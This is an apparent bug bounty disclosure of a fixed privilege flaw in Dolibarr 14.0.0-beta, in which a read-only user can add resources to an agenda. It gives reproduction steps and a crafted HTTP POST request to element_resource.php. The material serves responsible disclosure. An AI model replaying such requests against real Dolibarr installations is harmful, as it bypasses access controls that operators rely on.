Improper Privilege Management in dolibarr/dolibarr


Reported on

May 23rd 2021


unprivileged user can add resource to a agenda


user with read-only permission can add resource agenda


dolibarr 14.0.0-beta


1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Events/Agenda and Resource module .

Events/Agenda-->Read actions (events or tasks) linked to his user account (if owner of event or just assigned to)
Resources-->Read resources

So, user B can see agenda assigned to him as contributor but cant modify .

2. Now from admin account goto Agenda module and create a Agenda .
Now admin add user B to this agenda as contributor.

3. Finally goto user B account and here user B can see agenda but cant edit agenda .
But user B can add resource to this Agenda with bellow request .

POST /dolibarr-develop/htdocs/resource/element_resource.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/resource/element_resource.php?element=action&element_id=2
Cookie: DOLINSTALLNOPING_ec41f89b17787dd4c217ae49b23f4604=0; DOLSESSID_8e8881ad773ee74880c453666c22c288=os0ama6kpuv1qvtr24r0rrj13d
Upgrade-Insecure-Requests: 1


Laurent Destailleur validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur marked this as fixed with commit 02632e a year ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation